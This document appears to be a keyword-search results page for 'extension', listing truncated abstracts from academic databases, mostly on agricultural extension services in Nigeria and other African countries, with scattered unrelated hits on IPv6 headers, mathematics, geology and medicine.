Ondo State, Nigeria. ... The study therefore recommended that extension organizations should consider a number of factors other than contact with farmers for farmers' adoption of new technologies. These include the arrangement of follow-up ... 7. analysis of selected issues in swaziland's agricultural extension African Journals Online (AJOL) This paper describes the development of agricultural extension in Swaziland with regard to history; organizational philosophy, mission, goals and objectives, implementation delivery system and evaluation; policy framework; funding; linkages between agricultural extension (AE) and research; the planning of AE activities; ... 8. Evaluation of Extension Agents Commitment to the Agricultural ... African Journals Online (AJOL) The study evaluated the activities of Extension agents on Agricultural Loans and Inputs Supply Programme participant farmers' rice output/income. Data were collected with the aid of a questionnaire from 60 Extension agents (participating in the ALIS programme) randomly selected from 6 LGAs (where the programme is ... 9. Confidence of Extension Staff in Akwa Ibom State Agricultural ... African Journals Online (AJOL) This study assessed the organizational confidence of extension staff in the Akwa Ibom State agricultural development programme (AKADEP). The study also determined the relationships between selected personal characteristics and organizational confidence variables of the extension staff. A sample of ninety (90) randomly ... 10. Threats and surprises behind IPv6 extension headers NARCIS (Netherlands) Hendriks, Luuk; Velan, Petr; de Oliveira Schmidt, Ricardo; De Boer, Pieter Tjerk; Pras, Aiko 2017-01-01 The concept of Extension Headers, newly introduced with IPv6, is elusive and enables new types of threats in the Internet. Simply dropping all traffic containing any Extension Header, a current practice by operators, seemingly is an effective solution, but at the cost of possibly dropping legitimate 11. A comparison of project participants and extension officers ...
African Journals Online (AJOL) The study examined the perception of project participants and extension officers regarding marketing of agricultural produce in agricultural projects in the North West Province. The objective of the study was primarily to compare the perceptions of project participants and extension officers. When establishing a project, ... 12. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza The study examined the perception and knowledge of project participants and extension officers about production knowledge in agricultural projects. The objective of the study was to compare the perception and knowledge of project participants and extension officers regarding production knowledge in agricultural projects ... 13. The Cleveland Museum of Art: Its Extensions Division. Science.gov (United States) Chakalis, Andrew T. 1987-01-01 Reviews the purposes and programs of the Extensions Division of the Department of Education of a metropolitan museum. Surveys services provided to schools. Gives a sample lesson plan. Highlights thematic exhibitions at the museum. Considers education by means of the art object as the primary goal of the Extensions Division. (CW) 14. University Extension and Urban Planning Programs: An Efficient Partnership. Science.gov (United States) Kotval, Zenia 2003-01-01 The Urban Planning Practicum is a capstone course engaging Michigan State students in urban outreach, working with community organizations on neighborhood revitalization. It facilitates the experiential learning needs of urban planning students while assisting Extension staff in capacity building. Faculty-extension agent partnerships make it… 15. Towards effective extension delivery approach and strategies for ... African Journals Online (AJOL) Towards effective extension delivery approach and strategies for food security poverty alleviation and sustainable development in Nigeria. ... This paper took an overview of extension delivery in the country and implied confusion, duplication and waste of resources. The paper recommends adequate implementation of ... 16. Analysis of the work environment of extension personnel in Benue ... African Journals Online (AJOL) This investigation was undertaken to ascertain the environment in which extension workers transact their legitimate professional duties in Benue and Plateau States. The analyses of the results obtained indicate that extension workers operate in a less satisfying environment to the extent that about 67.3%, 36.9%, 88.2%, ... 17. Affecting Community Change: Involving "Pro Bono" Professionals as Extension Volunteers Science.gov (United States) Kelley, Diane T.; Culp, Ken, III 2013-01-01 "Pro bono" volunteers provide an effective means for Extension professionals to expand limited financial and human resources. Volunteers recruited from business settings can provide skills, abilities, expertise, leadership, and resources to Extension programs. Allowing professional volunteers to meet their desired leadership goals while… 18. Trends and Challenges in Nigerian Extension Education and Research Science.gov (United States) Gombe, Sani Yakubu; Bin Suandi, Turiman; Ismail, Ismi Arif; Omar, Zohara 2016-01-01 Research in extension education is a serious and challenging task facing Nigeria today because of new trends that keeps on emerging continuously. 
This paper seeks to examine some of the common research techniques used in extension education and describe their applicability and workability in helping people to help themselves. Most of the… 19. A glacier runoff extension to the Precipitation Runoff Modeling System Science.gov (United States) A. E. Van Beusekom; R. J. Viger 2016-01-01 A module to simulate glacier runoff, PRMSglacier, was added to PRMS (Precipitation Runoff Modeling System), a distributed-parameter, physical-process hydrological simulation code. The extension does not require extensive on-glacier measurements or computational expense but still relies on physical principles over empirical relations as much as is feasible while... Science.gov (United States) Ragasa, Catherine; Berhane, Guush; Tadesse, Fanaye; Taffesse, Alemayehu Seyoum 2013-01-01 Purpose: This article contributes new empirical evidence and nuanced analysis on the gender difference in access to extension services and how this translates to observed differences in technology adoption and agricultural productivity. Approach: It looks at the case of Ethiopia, where substantial investments in the extension system have been… 1. Evaluation of the effectiveness of the Imo State fisheriers extension ... African Journals Online (AJOL) This study evaluated the Imo State Ministry of Agriculture Fisheries Extension Programmes. Questionnaires were used to collect data from 15 randomly selected extension staff and 200 proportionately selected fish farmers from the three fisheries zones of the state between November 1997 and February 1998. Data were ... 2. Extension Youth Educators' Technology Use in Youth Development Programming Science.gov (United States) McClure, Carli; Buquoi, Brittany; Kotrlik, Joe W.; Machtmes, Krisanna; Bunch, J. C. 2014-01-01 The purpose of this descriptive-correlational study was to determine the use of technology in youth programming by Extension youth development educators in Louisiana, Mississippi, and Tennessee. Data were collected via e-mail and a SurveyMonkey© questionnaire. Extension educators are using some technology in youth development programming. More… 3. Twitter Chats: Connect, Foster, and Engage Internal Extension Networks Science.gov (United States) Seger, Jamie; Hill, Paul; Stafne, Eric; Swadley, Emy 2017-01-01 The eXtension Educational Technology Learning Network (EdTechLN) has found Twitter to be an effective form of informal communication for routinely engaging network members. Twitter chats provide Extension professionals an opportunity to reach and engage one other. As the EdTechLN's experimentation with Twitter chats has demonstrated, the use of… 4. Use of Demonstration Gardens in Extension: Challenges and Benefits Science.gov (United States) Glen, Charlotte D.; Moore, Gary E.; Jayaratne, K. S. U.; Bradley, Lucy K. 2014-01-01 Extension agents' use of demonstration gardens was studied to determine how gardens are employed in horticultural programming, perceived benefits and challenges of using gardens for Extension programming, and desired competencies. Gardens are primarily used to enhance educational efforts by providing hands-on learning experiences. Greatest… 5. The path group construction of Lie group extensions OpenAIRE Vizman, Cornelia 2007-01-01 We present an explicit realization of abelian extensions of infinite dimensional Lie groups using abelian extensions of path groups, by generalizing Mickelsson's approach to loop groups and the approach of Losev-Moore-Nekrasov-Shatashvili to current groups. 
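For context on the path-group entry above (its abstract resumes below with the applications): the abelian Lie group extensions it constructs are governed, at the Lie algebra level, by 2-cocycles. The condition displayed below is the standard Chevalley–Eilenberg one from general theory, not a formula taken from the paper, for a Lie algebra g acting on an abelian Lie algebra a.

```latex
% Standard 2-cocycle condition governing an abelian extension
%   0 -> a -> g_omega -> g -> 0,
% where g_omega = g (+) a carries the bracket
%   [(x,a),(y,b)] = ([x,y], x.b - y.a + omega(x,y)).
\[
  x\cdot\omega(y,z) \;-\; y\cdot\omega(x,z) \;+\; z\cdot\omega(x,y)
  \;-\; \omega([x,y],z) \;+\; \omega([x,z],y) \;-\; \omega([y,z],x) \;=\; 0 .
\]
% With a trivial action this reduces to the cyclic identity
%   omega([x,y],z) + omega([y,z],x) + omega([z,x],y) = 0,
% i.e. the familiar condition for central extensions.
```

Cocycles differing by a coboundary give equivalent extensions, which is why results in this area are naturally phrased in terms of second (continuous) Lie algebra or Lie group cohomology.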
We apply our method to coupled cocycles on current Lie algebras and to Lichnerowicz cocycles on the Lie algebra of divergence-free vector fields. 6. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI The results confirm the a priori expectation that the use of ICT facilities was higher among extension agents than rural farmers. This may be because of their level of education and income status. This implies that extension agents can also be used in the dissemination of information about, and adoption of, the internet among farmers ... 7. Challenges of extension workers in reaching rural women farmers in ... African Journals Online (AJOL) The study examined the challenges of extension workers in reaching rural women farmers in Enugu State, Nigeria. A questionnaire was used to collect data from a sample size of 52 extension workers. Data were analyzed using percentage, mean statistic, chart and factor analysis. Results revealed that training and visit ... 8. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) SH Assessment of Extension Service Delivery on Improved Cassava Technologies Among Cassava Farmers in Osun State, Nigeria. 1Ajala, A. O., 1Ogunjimi, S.I. and 2Farinde, A.J. 1Department of Agricultural Extension and Rural Development, Landmark University, Omu-Aran, Kwara State. 2Department of Agricultural ... 9. Reforming the Public Agricultural Extension System in China ... International Development Research Centre (IDRC) Digital Library (Canada) Reforming the Public Agricultural Extension System in China: Supporting Rural Innovation. The public agricultural extension system has played a critical role in Chinese agricultural development over the past few decades. There is growing evidence that since the mid-1990s the system has failed to provide new and ... 10. The Impact Of Information And Communication In Extension ... African Journals Online (AJOL) The article examines the impact of information and communication in extension services to rural farmers in the Niger-Delta. Questionnaire, interview and personal observation methods were employed to elicit information on the impact of information and communication in extension services to rural farmers. The study reveals the ... 11. Achieving Impact at Scale through ICT-Enabled Extension Services ... International Development Research Centre (IDRC) Digital Library (Canada) The Government of Ghana is looking for alternatives to conventional extension services to ensure better outreach to poor farmers and rural women. The expansion of mobile technology will connect farmers to extension resources and link them to profitable markets. The research team will scale up an ICT-based agricultural ... 12. Challenges and agricultural extension needs of urban and peri ... African Journals Online (AJOL) ... management (M=2.00), among others. Extension agents should regularly disseminate information on livestock production to urban and peri-urban livestock keepers via training, demonstration sessions or other extension teaching methods. Keywords: Animals, Constraints, dissemination, Farmers, Information, Production ... 13. Evaluation Of The Job Performance Of Extension Professionals In ... African Journals Online (AJOL) The study was designed to assess the job performance of extension professionals in Abia State agricultural development programme (ADP).
The study also highlighted the relationship between selected personal characteristics and job performance variables of extension professionals in Abia state ADP. A sample of ninety six ... 14. Determinants of job effectiveness of extension personnel in Oyo ... African Journals Online (AJOL) The study examined the determinants of job effectiveness of extension personnel of OYSADEP and FADU organizations. Disproportionate sampling procedure was used to select 94% and 81% from the population of extension personnel in the two organizations to obtain 120 respondents for the study. Structured and ... 15. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI gone into maintaining its organization and staffing (Qamar, 2005). Public institutions are funded with the public funds and as such are supposed to serve the public. In the case of agricultural extension, the organization is meant to serve the extension, education and training needs of both EAs and farmers (Qamar, 2005). 16. Extensive peritoneal calcifications associated with continuous ambulatory peritoneal dialysis Energy Technology Data Exchange (ETDEWEB) Kim, Hyo Cheol; Kim, Tae Kyoung; Han, Joon Koo; Choi, Ja Young; Lee, Dong Kyung; Choi, Byung Ihn [College of Medicine and the Institute of Radiation Medicine, Seoul National University, Seoul (Korea, Republic of); Park, Yang Hee [National Police Hospital, Seoul (Korea, Republic of) 2000-07-01 Peritoneal calcification, which can lead to intestinal obstruction and potentially lethal hemoperitoneum, is a rare complication of continuous ambulatory peritoneal dialysis. We describe a case in which extensive peritoneal calcification had arisen for this reason. Although the patient was asymptomatic, extensive calcification was present on the parietal and visceral peritoneum, including the hepatic and splenic surface. (author) 17. Ocular discomforts following eyelash extension | Koffuor | Journal of ... African Journals Online (AJOL) Eyelash extension has become common practice for enhancing beauty among Ghanaian women on occasions such as weddings, festivities, and other social gatherings including funerals. This study was therefore conducted to ascertain the effect of eyelash extension on the eyelid and on vision. One hundred and twenty ... 18. Extension and advisory services: the African renaissance | Zwane ... African Journals Online (AJOL) These organisations can be considered as a source of renaissance in agricultural advisory services. They have facilitated the development of structures that advocate for extension and advisory services. These organisations have brought focus, and initiated debate on the concept of extension. The importance of such ... 19. Community Health: FCS Extension Educators Deliver Diabetes Education in PA Science.gov (United States) Cox, Jill N.; Corbin, Marilyn 2011-01-01 For decades, family and consumer sciences (FCS) Extension educators have provided health related education to consumers through Cooperative Extension programming at land grant universities. However, offering diabetes education can be extra challenging due to the complicated nature of the disease and the multi-faceted treatment required. Faced with… 20. Challenges facing the agricultural extension landscape in South ... 
African Journals Online (AJOL) The role of the South African Society for Agricultural Extension (SASAE) in the way forward will be to: Determine continuously what the agricultural extension landscape will need in 10 years' time; establish and implement a Continuous Professional Development (CPD) Committee to ensure continuing professional ... 1. Indicators for Evaluating County Extension Office Computer Uses. Science.gov (United States) Wright, M. Anthony; Long, James S. Extension leadership articulated several broad goals for the use of microcomputers within cooperative extension. These included providing information, service to clients, office automation, and enhancement of the educational process. A questionnaire was administered regarding microcomputer use within Washington State University County Cooperative… 2. Packaging Research Outputs into Extension and Training Materials ... African Journals Online (AJOL) As a result one primary objective of research to develop improved production systems and get the research results out to the user is not achieved. This paper describes the experiences and lessons learned in packaging research outputs into extension and training materials for use by extension workers and farmers under ... 3. Assessment of veterinary extension services to livestock farmers in ... African Journals Online (AJOL) The study examined operational modes of providing veterinary extension services to livestock farmers in Egba-Division, Ogun-State Nigeria. Information was obtained from 120 livestock farmers and 8 extension agents selected through multi-stage random sampling technique with the use of both structured questionnaire ... 4. Study of the Working Conditions of Health Extension Workers in ... African Journals Online (AJOL) Coverage: 2005-2009” of which “The Health Extension Program (HEP)” is a major component”. Objective: The study focuses on the first batch of Health Extension Workers (HEWs) with the overall objective of assessing the working conditions of HEWs and their job satisfaction. Methods: An in-depth field study was carried ... 5. Problems associated with extension visists among maize farmers in ... African Journals Online (AJOL) This study investigated the problems related to field visits carried out by extension staff to farmers in the rural areas. A total of 125 farmers were purposively and randomly sampled for this study from two villages, in Kaduna State, Nigeria. The three objectives were; (1) to identify the period of extension visits carried out by the ... 6. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) Extension service delivery is too often merely seen as a vehicle for spreading scientific and technical progress and technology transfer. In the real sense, however, dissemination of knowledge is not a one way affair from scientists to producers. The study was conducted to assess extension service delivery on improved ... 7. On non-extensive nature of thermal conductivity obtained for the silica aerogel thermal conductivity data at low temperature. Keywords. Non-extensive; thermal conductivity; specific heat; silica aerogels. PACS Nos 65.60.+a; 63.70.+h; 64.60.-i. 1. Motivation. Non-extensive statistics is being increasingly used to explain anomalous behaviour observed in the properties of ... 8. 9 CFR 124.20 - Patent term extension calculation. Science.gov (United States) 2010-01-01 ... 9 Animals and Animal Products 1 2010-01-01 2010-01-01 false Patent term extension calculation. 124... 
OF AGRICULTURE VIRUSES, SERUMS, TOXINS, AND ANALOGOUS PRODUCTS; ORGANISMS AND VECTORS PATENT TERM RESTORATION Regulatory Review Period § 124.20 Patent term extension calculation. (a) As provided in 37 CFR 1... 9. Motivational needs assessment of extension agents of Abia State ... African Journals Online (AJOL) This study assessed the motivational needs of extension agents of Abia Agricultural Development Project. Stratified random sampling technique was adopted to select a total of 128 extension agents (EAs) from the State. Data on the effects of various needs/motivational theories (as Maslows' needs hierarchy theory, ... 10. Issues for Agricultural Extension Policy in Nigeria | Koyenikan ... African Journals Online (AJOL) The paper suggests as the goal; achievement of a well organized extension system for efficient and effective extension delivery in all aspects of sustainable agriculture and rural development to attain food security, poverty reduction, rural empowerment and environment management. It concludes with a summary of key ... 11. The compatibility between extension aims of staff and their ... African Journals Online (AJOL) This pilot investigation was done to investigate the compatibility between extension aims of extension staff and those of their employer. It shows that only 50 percent of respondents have an acceptable understanding of the official aims (vision), and that none of the components of the official vision has sufficient compatibility ... 12. Assessment of training needs of extension staff of agricultural ... African Journals Online (AJOL) The tasks performed by the extension staff ranged from advising farmers on improving methods of farming to new task on health issues such as campaign on HIV/AIDS. The study identified strong training needs for Edo State extension agents on communication skills (X= 4.60), planning demonstration (X=4.60), evaluation of ... 13. Factors influencing extension service delivery in maize production ... African Journals Online (AJOL) Conventional extension system in Tanzania has recorded limited success in improving agricultural productivity including maize production in the country. The Agricultural Innovation System (AIS) approach in extension service delivery deemed desirable in addressing the challenge. However little is known about the factors ... 14. 76 FR 36996 - Extension of Time for Filing Returns Science.gov (United States) 2011-06-24 ... partnership's last known address. For further guidance regarding the definition of last known address, see Sec... extensions of time to file returns for partnership, trust, and estate taxpayers, and automatic extensions of... entities (most partnerships, estates, and certain trusts). As these pass-through entities were previously... 15. 78 FR 79660 - Enhancing Agricultural Coexistence; Extension of Comment Period Science.gov (United States) 2013-12-31 ...] Enhancing Agricultural Coexistence; Extension of Comment Period ACTION: Notice; extension of comment period... order to further agricultural coexistence. This action will allow interested persons additional time to... among those involved in diverse agricultural systems on the topic of coexistence as well as how USDA can... 16. Extremal extensions for the sum of nonnegative selfadjoint relations NARCIS (Netherlands) Hassi, Seppo; Sandovici, Adrian; De Snoo, Henk; Winkler, Henrik 2007-01-01 The sum A + B of two nonnegative selfadjoint relations (multivalued operators) A and B is a nonnegative relation. 
The class of all extremal extensions of the sum A + B is characterized as products of relations via an auxiliary Hilbert space associated with A and B. The so-called form sum extension 17. evaluation of job performance of village extension agents in lagos African Journals Online (AJOL) AFINNI IMAM A Case For Participatory (Cost Sharing) Approach to Agricultural. Extension Delivery in .... According to Ozor et al (2007), cost-sharing extension approach involves government-farmer partnership in the funding of .... (i) Prevailing unfavourable economic environment within the national economy: Apparent misgivings about ... 18. Private sector participation in agricultural extension service in nigeria African Journals Online (AJOL) The issue of who is to undertake and sustain an efficient agricultural extension service delivery between the public and private sectors in sub-saharan Africa has continued to feature prominently among the extension stakeholders and professionals. This has become pertinent, especially in recent times where government's ... 19. Making the Case for Demographic Data in Extension Programming Science.gov (United States) Curtis, Katherine J.; Verdoff, Daniel; Rizzo, Bill; Beaudoin, James 2012-01-01 Understanding one's community is essential for effective Extension programming across all program areas. The use of current and reliable demographic data is crucial for Extension to develop effective education and programming to track change and to uncover hidden community characteristics. We discuss what demographic data are, present… 20. Modes of continental extension in a crustal wedge KAUST Repository Wu, Guangliang 2015-07-01 © 2015 Elsevier B.V. We ran numerical experiments of the extension of a crustal wedge as an approximation to extension in an orogenic belt or a continental margin. We study the effects of the strength of the lower crust and of a weak mid-crustal shear zone on the resulting extension styles. A weak mid-crustal shear zone effectively decouples upper crustal extension from lower crustal flow. Without the mid-crustal shear zone, the degree of coupling between the upper and the lower crust increases and extension of the whole crust tends to focus on the thickest part of the wedge. We identify three distinct modes of extension determined by the strength of the lower crust, which are characterized by 1) localized, asymmetric crustal exhumation in a single massif when the lower crust is weak, 2) the formation of rolling-hinge normal faults and the exhumation of lower crust in multiple core complexes with an intermediate strength lower crust, and 3) distributed domino faulting over the weak mid-crustal shear zone when the lower crust is strong. A frictionally stronger mid-crustal shear zone does not change the overall model behaviors but extension occurred over multiple rolling-hinges. The 3 modes of extension share characteristics similar to geological models proposed to explain the formation of metamorphic core complexes: 1) the crustal flow model for the weak lower crust, 2) the rolling-hinge and crustal flow models when the lower crust is intermediate and 3) the flexural uplift model when the lower crust is strong. Finally we show that the intensity of decoupling between the far field extension and lower crustal flow driven by the regional pressure gradient in the wedge control the overall style of extension in the models. 1. 
Solutions to Burnout and Retention as Perceived by County Extension Agents of the Colorado State University Extension System Directory of Open Access Journals (Sweden) Matt Benge 2015-02-01 Full Text Available This study explored solutions to the issue of burnout and retention of Extension agents. Extension agents experience burnout for reasons such as long hours, stress, and organizational factors. As Extension administration addresses job satisfaction and performance of Extension employees, burnout and retention issues identified in this study can facilitate efforts to enhance the effectiveness of a statewide Extension program. Herzberg’s Motivation-Hygiene Theory was the theoretical framework for this study. Researchers used the constant-comparative method of analysis to identify recurring themes from the open-ended items of an online-administered survey. Twelve primary themes emerged, including (a compensation, (b hiring practices, (c promotion and advancement within Extension, (d organizational support regarding agent development, (e organizational support regarding administration, (f organizational support regarding colleagues, (g reporting, (h recognition, (i resources, (j personnel and staffing, (k evaluation of administration and specialists, and (l workload. Results suggest that Extension administration should focus on the maintenance factors of compensation, workload, and internal promotion and advancement, as well as motivating factors, to improve retention of Extension agents. 2. Modeling Brand Extension as a Real Option: How Expectation, Competition and Financial Constraints Drive the Timing of Extensions NARCIS (Netherlands) L.H. Pattikawa 2006-01-01 textabstractDespite their strategic importance firm’s motivations to extend brands have received only modest attentions by marketing scholars. We use multiple events duration models to examine the timing of launching brand extensions. We provide a theoretical framework of brand extensions based on 3. How different are ICT-supported pedagogical practices from extensive and non-extensive ICT-using science teachers? NARCIS (Netherlands) Voogt, Joke 2009-01-01 This paper aims to understand the differences between characteristics of ICT-supported pedagogical practices of grade 8 science teachers of extensive and non-extensive ICT-using science teachers. The differences of the pedagogical practices are described in terms of innovative and traditionally 4. Surveillance extension experience at WWER-440 type reactors International Nuclear Information System (INIS) Gillemot, F.; Uri, G.; Oszwald, F.; Trampus, P. 1993-01-01 In WWER-440 reactors, the surveillance specimens are located in accelerated irradiation positions. After 5 years, all specimens are withdrawn and the operational changes are not monitored. At Paks NPP a new surveillance program extension has been settled in order to avoid these original program disadvantages and generate further data for plant lifetime management. This paper includes: research performed to prepare the surveillance extension programme, the evaluation method for the surveillance extension, and first results (Charpy and tensile tests). (authors). 6 refs., 12 figs., 3 tabs 5. 
Nuclear modification factor using Tsallis non-extensive statistics Energy Technology Data Exchange (ETDEWEB) Tripathy, Sushanta; Garg, Prakhar; Kumar, Prateek; Sahoo, Raghunath [Indian Institute of Technology Indore, Discipline of Physics, School of Basic Sciences, Simrol (India); Bhattacharyya, Trambak; Cleymans, Jean [University of Cape Town, UCT-CERN Research Centre and Department of Physics, Rondebosch (South Africa) 2016-09-15 The nuclear modification factor is derived using Tsallis non-extensive statistics in relaxation time approximation. The variation of the nuclear modification factor with transverse momentum for different values of the non-extensive parameter, q, is also observed. The experimental data from RHIC and LHC are analysed in the framework of Tsallis non-extensive statistics in a relaxation time approximation. It is shown that the proposed approach explains the R{sub AA} of all particles over a wide range of transverse momentum but does not seem to describe the rise in R{sub AA} at very high transverse momenta. (orig.) 6. Development of a University Extension Program in a Federal Penitentiary Science.gov (United States) McCleary, Charles H. 1974-01-01 The report documents the development and the results of the educational program in the Saskatchewan Penitentiary from 1971 through 1974. Available from: Extension Division, University of Saskatchewan, Saskatoon S7N OWO. (MW) 7. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) Ben Stevens ; Jacobson,. 2013:30; Fischer, Van den ... 13 Unit for Environmental Sciences and Management, North-West University, Potchefstroom, 2520, South. Africa. ..... dissemination media by extension personnel may adversely affect the potential for. 8. South African Journal of Agricultural Extension - Vol 35 (2006) African Journals Online (AJOL) Job satisfaction amongst agricultural extension personnel in Kurdistan Province of Iran · EMAIL FREE FULL TEXT EMAIL FREE FULL TEXT · DOWNLOAD FULL TEXT DOWNLOAD FULL TEXT. A Rezvanfar, H Vaisy, 176-187 ... 9. Minding the gap between policy and practice amongst extension ... African Journals Online (AJOL) ) provides the contextual and institutional framework for all of governments activities. As a result, there is a call for extension to increasingly become associated with efficient and effective delivery of services in line with government policy to ... 10. Extensive cerebral and cerebellar calcifications in primary hypoparathyroidism Energy Technology Data Exchange (ETDEWEB) Kock, C.; Kruse, H.P. 1982-09-01 This is a report on a patient with primary hypoparathyreoidism showing extensive calcifications of cerebrum and cerebellum in computed tomography. Nevertheless, the patient does not have any neurological disturbances. 11. Extension encourages parents to take a stand against bullying OpenAIRE Sutphin, Michael D. 2008-01-01 As students return to classrooms and playgrounds around the commonwealth for a new school year, Virginia Cooperative Extension is urging parents to talk to their child about bullying and to understand their school's policies on this important topic. 12. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) SH 1Department of Agricultural Extension and Rural Development, Landmark University, Omu –Aran, Kwara. State. 2Department ... production technologies among cassava farmers in Osun State, Nigeria. Multistage ... 
included fertilizer procurement, agrochemicals, cooperative facilities, social networks, tractor hiring services. 13. A facility for creating Python extensions in C++ International Nuclear Information System (INIS) Dubois, P F 1998-01-01 Python extensions are usually created by writing the glue that connects Python to the desired new functionality in the C language. While simple extensions do not require much effort, to do the job correctly with full error checking is tedious and prone to errors in reference counting and to memory leaks, especially when errors occur. The resulting program is difficult to read and maintain. By designing suitable C++ classes to wrap the Python C API, we are able to produce extensions that are correct and which clean up after themselves correctly when errors occur. This facility also integrates the C++ and Python exception facilities. This paper briefly describes our package for this purpose, named CXX. The emphasis is on our design choices and the way these contribute to the construction of accurate Python extensions. We also briefly relate the way CXX's facilities for sequence classes allow use of C++'s Standard Template Library (STL) algorithms on C++ sequences. 14. Extensions of solutions of a functional equation in two variables Directory of Open Access Journals (Sweden) Janusz Matkowski 2009-01-01 Full Text Available An extension theorem for the functional equation of several variables $f(M(x,y)) = N(f(x), f(y))$, where the given functions $M$ and $N$ are left-side autodistributive, is presented. 15. Research and extension processes and practices in relation to ... African Journals Online (AJOL) Institute for Agricultural Research, Ahmadu Bello University, Zaria. 2Dept. of Agricultural Economics and Extension, Usmanu Danfodiyo University, Sokoto. 3Dept. of Agricultural Economics and Rural Sociology, Ahmadu Bello University, Zaria. 17. 78 FR 15743 - Proposed Extension of Existing Collection; Comment Request Science.gov (United States) 2013-03-12 ..., or Email). SUPPLEMENTARY INFORMATION: I. Background Section 423 of the Black Lung Benefits Act, as... black lung benefits as required by the Act. Type of Review: Extension. Agency: Office of Workers... 18. Is agricultural extension positioned to promote agripreneurship in ... African Journals Online (AJOL) scale agriculture in South Africa and to make it more attractive and a profitable venture. The question is whether small-scale farmers can become entrepreneurs and how well is extension positioned to support farmers to foster entrepreneurship ... 19. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza Keywords: baseline survey; land reform; farm management; extension. ABSTRACT. Land reform ... Government. 5 Department of Agricultural Management, School for Natural Resource Management, Nelson Mandela ..... reform farmers. About 50% of the farms indicated a practice of having definite breeding seasons, with. 20. 31 CFR 545.414 - Loans or extensions of credit. Science.gov (United States) 2010-07-01 ...) OFFICE OF FOREIGN ASSETS CONTROL, DEPARTMENT OF THE TREASURY TALIBAN (AFGHANISTAN) SANCTIONS REGULATIONS... loans or extensions of credit to a person in the territory of Afghanistan controlled by the Taliban... 1. 11 CFR 100.55 - Extension of credit. Science.gov (United States) 2010-01-01 ... substantially similar to extensions of credit to nonpolitical debtors that are of similar risk and size of obligation.
If a creditor fails to make a commercially reasonable attempt to collect the debt, a contribution... 2. Case Series: Cyclops lesion - extension loss after ACL reconstruction Directory of Open Access Journals (Sweden) Dhanda Sunita 2010-01-01 Full Text Available Localized anterior arthrofibrosis (cyclops lesion) is the second most common cause of extension loss after anterior cruciate ligament (ACL) reconstruction. We present and discuss two patients with prior ACL reconstructions, who presented with pain and loss of extension following surgery. MRI and arthroscopy of the knee revealed typical features of a cyclops lesion. The patients showed significant symptomatic improvement following arthroscopic resection of these lesions. 3. Another extension of Orlicz-Sobolev spaces to metric spaces Directory of Open Access Journals (Sweden) Noureddine Aïssaoui 2004-01-01 Full Text Available We propose another extension of Orlicz-Sobolev spaces to metric spaces based on the concepts of the Φ-modulus and Φ-capacity. The resulting space N^1_Φ is a Banach space. The relationship between N^1_Φ and M^1_Φ (the first extension, defined in Aïssaoui (2002)) is studied. We also explore and compare different definitions of capacities and give a criterion under which N^1_Φ is strictly smaller than the Orlicz space L^Φ. 4. Rural household and resources: A guide for extension workers OpenAIRE Socio-Economic and Gender Analysis Programme (SEAGA) 2004-01-01 Metadata only record This guide is divided into three parts: Part 1 explores themes on farmers, households, resources and extension. Each point raises questions on gender roles and gender relations, stressing the importance of gender-disaggregated data. Part 2 focuses on constraints and resources in rural households. Major issues such as HIV, macro-level policies, and income generating opportunities affect communities differently, so extension workers can help identify impacts and needs ac... 5. Scattering theory for non-selfadjoint extensions of symmetric operators OpenAIRE Cherednichenko, Kirill D.; Kiselev, Alexander V.; Silva, Luis O. 2017-01-01 This work deals with the functional model for extensions of symmetric operators and its applications to the theory of wave scattering. In terms of Boris Pavlov's spectral form of this model, we find explicit formulae for the action of the unitary group of exponentials corresponding to almost solvable extensions of a given closed symmetric operator with equal deficiency indices. On the basis of these formulae, we are able to construct wave operators and derive a new representation for the scat... 6. Topology Design for Directional Range Extension Networks with Antenna Blockage Science.gov (United States) 2017-03-19 Topology Design for Directional Range Extension Networks with Antenna Blockage Thomas Shake MIT Lincoln Laboratory [email protected] Abstract...associated electronics into small aircraft to perform such range extension. In particular, the paper examines trade-offs in network topology design...aircraft, and the topology characteristics of the aerial relay network. The analysis suggests that low-degree air topologies such as rings and strings 7. Old people's extensive traumatic cerebral infarction (analysis of 48 cases) International Nuclear Information System (INIS) Xu Wenhui 2000-01-01 Objective: To analyse clinically the genetic mechanism, clinical characteristics and the prognosis of old people's extensive traumatic cerebral infarction. Method: Forty eight such cases have been observed and analysed.
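For readers of the Orlicz-Sobolev entry above (Aïssaoui, item 3), the spaces whose notation appears there are usually defined as follows; these are standard definitions recalled only for orientation, not text taken from that paper. The Orlicz space L^Φ consists of the measurable functions f with finite Luxemburg norm
\[ \|f\|_{L^\Phi} \;=\; \inf\Big\{ k>0 \;:\; \int_X \Phi\big(|f|/k\big)\,d\mu \le 1 \Big\}, \]
the Hajłasz-type space M^1_Φ additionally asks for a generalized gradient g ∈ L^Φ with |f(x) − f(y)| ≤ d(x, y)(g(x) + g(y)) for almost every pair x, y, and the Newtonian-type space N^1_Φ replaces this pointwise inequality by an upper-gradient inequality along Φ-modulus-almost-every curve, which is where the Φ-modulus and Φ-capacity named in the abstract enter.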
Results: Old people's extensive traumatic cerebral infarction had distinctive characteristics: it occurred mostly in the territory supplied by large branch vessels and was accompanied by observable nerve function deficits. Conclusion: It carries more clinical complications and a poor prognosis, and the death rate is high. 8. Timber productivity research gaps for extensive forest management Science.gov (United States) L.C. Irland 2011-01-01 On extensive areas of small scale forests, significant opportunities for improving the value of future timber harvests while also improving other resource values are now being missed. A new focus on practical extensive management research is needed, especially as implementation of intensive practices has been declining in many areas, and new ‘‘close to nature’’... OpenAIRE Ferdila, Raihani 2014-01-01 The study investigates the benefits of using extensive reading in teaching reading as well as students' attitudes toward it. A case study design as a part of qualitative research was employed in this study. The data were collected through classroom observation, questionnaire and interview. The participants of this study were a class of second graders in one of the public junior high schools in Bandung. The findings reveal that extensive reading was beneficial in teaching reading. There are fi... 10. Pricing of brand extensions based on perceptions of brand equity Directory of Open Access Journals (Sweden) Panagiotis Arsenos 2018-04-01 Full Text Available The paper explores the role of brand equity when pricing hypothetical brand extensions. Companies tend to use different pricing techniques for their products, and their pricing decisions are based on many factors, including image and category fit of the product with the existing image and products of the company. Brand extensions are usually investigated from a consumer perspective, focusing on the extension attitude; however, it is essential to understand the corporate decision-making process regarding pricing. 